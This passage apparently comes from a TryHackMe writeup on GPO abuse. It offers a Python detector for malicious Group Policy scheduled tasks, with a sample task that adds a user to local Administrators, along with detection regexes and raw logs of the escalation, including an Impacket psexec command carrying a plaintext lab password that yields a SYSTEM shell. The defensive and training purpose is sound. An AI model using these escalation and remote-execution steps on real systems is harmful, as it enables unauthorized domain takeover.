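The SharpGPOAbuse run above leaves a concrete artefact in SYSVOL: a new immediate task in `Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` under the GPO's folder, plus a bumped version in GPT.INI. Anyone auditing SYSVOL can parse that file directly. The detector below is an added example (not the tool's or the page's code); it walks a Group Policy Preferences ScheduledTasks.xml and flags tasks whose command line adds local administrators, creates users or runs encoded PowerShell, and immediate tasks that run as SYSTEM. The XML is a constructed sample in the GPP layout (`ImmediateTaskV2`/`TaskV2` > `Properties` > `Task` > `Actions` > `Exec`) as I understand it; the CLSIDs and UIDs are illustrative.

```python
import re
import xml.etree.ElementTree as ET

# Constructed GPP ScheduledTasks.xml: one entry of the kind the writeup creates and one
# ordinary task for contrast. Structure and CLSIDs are assumed, not copied from a target.
SAMPLE_SCHEDULED_TASKS_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="makemeadmin" image="0"
      changed="2021-02-23 23:09:44" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="makemeadmin" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators enterprise-security /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Purge public docs" image="0"
      changed="2021-02-23 19:33:18" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" name="Purge public docs" runAs="VULNNET\enterprise-security" logonType="Password">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>-File C:\Enterprise-Share\PurgeIrrelevantData_1826.ps1</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Command-line patterns worth a human look when they appear in a GPO-pushed task.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\b.*?/add\b", re.I),
     "adds a member to local Administrators"),
    (re.compile(r"\bnet1?(?:\.exe)?\s+user\b.*?/add\b", re.I),
     "creates a user account"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
     "runs encoded PowerShell"),
]


def find_suspicious_tasks(xml_text):
    """Return a finding dict for every task entry that trips at least one rule."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        for exec_el in props.iter("Exec"):
            command = (exec_el.findtext("Command") or "").strip()
            args = (exec_el.findtext("Arguments") or "").strip()
            full = f"{command} {args}".strip()
            reasons = [why for rx, why in SUSPICIOUS_PATTERNS if rx.search(full)]
            if task.tag.startswith("ImmediateTask") and run_as.upper().endswith("SYSTEM"):
                reasons.append("immediate task running as SYSTEM")
            if reasons:
                findings.append({"name": task.get("name"), "type": task.tag,
                                 "run_as": run_as, "command": full, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"{f['type']} '{f['name']}' as {f['run_as']}: {f['command']} -> {', '.join(f['reasons'])}")
```

Run this over every `Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` in SYSVOL on a schedule and alert on new findings; pairing it with the `versionNumber` attribute on the GPO object (visible in the `Get-DomainGPO` output above) tells you when a policy changed, even if the task was later removed. The root cause, a domain user holding write rights on a GPO, is found with an ACL review of the `CN=Policies` container and the GPO's SYSVOL folder.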
----
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 3:01:37 PM
Password expires Never
Password changeable 2/24/2021 3:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/8/2024 11:10:09 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
--------
python psexec.py enterprise-security:sand_0873959498@10.10.49.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.49.44.....
[*] Found writable share ADMIN$
[*] Uploading file qludKPxL.exe
[*] Opening SVCManager on 10.10.49.44.....
[*] Creating service cvAd on 10.10.49.44.....
[*] Starting service cvAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system